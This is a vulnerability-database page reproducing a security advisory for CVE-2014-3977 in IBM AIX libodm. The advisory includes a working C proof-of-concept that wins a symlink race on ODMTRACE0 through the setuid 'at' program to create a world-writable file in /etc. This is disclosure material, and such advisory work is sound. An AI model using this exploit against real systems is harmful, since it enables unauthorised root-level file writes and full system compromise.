Vulners
Lucene search
IBM AIX 6.1.8 libodm - Arbitrary File Write
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | IBM AIX 6.1.8 libodm - Arbitrary File Write | 13 Jun 201400:00 | – | zdt |
 | AIX 6.1 TL 6 : libodm (IV21379) | 30 Jan 201300:00 | – | nessus |
| AIX 6.1 TL 7 : libodm (IV21381) | 30 Jan 201300:00 | – | nessus |
| AIX 7.1 TL 0 : libodm (IV21382) | 30 Jan 201300:00 | – | nessus |
| AIX 7.1 TL 1 : libodm (IV21383) | 30 Jan 201300:00 | – | nessus |
| AIX 6.1 TL 9 : libodm (IV60299) | 28 May 201400:00 | – | nessus |
| AIX 7.1 TL 3 : libodm (IV60303) | 28 May 201400:00 | – | nessus |
| AIX 6.1 TL 8 : libodm (IV60311) | 28 May 201400:00 | – | nessus |
| AIX 7.1 TL 1 : libodm (IV60312) | 28 May 201400:00 | – | nessus |
| AIX 6.1 TL 7 : libodm (IV60313) | 28 May 201400:00 | – | nessus |
10
Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown
Details:
It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }
It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
EPSS0.00454